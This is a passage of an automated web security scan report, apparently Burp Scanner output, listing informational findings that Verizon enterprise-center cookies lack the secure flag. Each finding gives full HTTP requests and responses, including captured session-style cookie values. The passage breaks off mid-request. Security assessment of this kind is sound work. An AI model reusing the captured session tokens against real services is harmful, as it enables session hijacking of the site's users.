Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1474
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:11 GMT
ETag: "5c2-4e228ad3"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89aQ...............mm............!..NETSCAPE2.0.....!..    ....,....Q....fh...0.I..8...-`(.Di.........:b].......;..a..aB...[..%Z..m2....8.is..w.F......e...h...f.d8^...........    .!.......,....Q....mx
...[SNIP]...

6.8. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/global/gHome.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/global/gHome.do HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0


6.9. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/selfreg/javascript/selfreg.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/javascript/selfreg.js HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: application/x-javascript
Last-Modified: Sun, 17 Jul 2011 07:10:54 GMT
ETag: W/"20e6-4e228afe"
Vary: accept-encoding
Cache-Control: private, max-age=28800
Date: Mon, 05 Sep 2011 22:22:43 GMT
Content-Length: 8422
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

function change(id, newClass)
{
       var theElement = document.getElementById(id);
       theElement.className = newClass;
}

function checkUserID()
{
       var userID = document.getElementById('userID');
       //a
...[SNIP]...

6.10. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do HTTP/1.1
Host: enterprisecenter.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fselfreg%2fsubmitEnrollmentProfileInfo%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:35:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT
Content-Length: 0


6.11. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1145
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "479-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a..d..................................wwwfffUUUDDD333"""................................................,......d..... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~...
...[SNIP]...

6.12. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 841
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "349-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

GIF89a..G............................wwwfffUUUDDD333"""......................................................!.......,......G.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.
...[SNIP]...

6.13. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 2234
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "8ba-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a..d..............55.((TTT...888xxx.......gg...'''.XXGGG.............DD.......ss.....................bbb..........................LL.......||......mmm...........................................
...[SNIP]...

6.14. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1435
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "59b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7185
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

...[SNIP]...

6.15. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 51
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "33-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


6.16. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 115
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "73-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


6.17. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
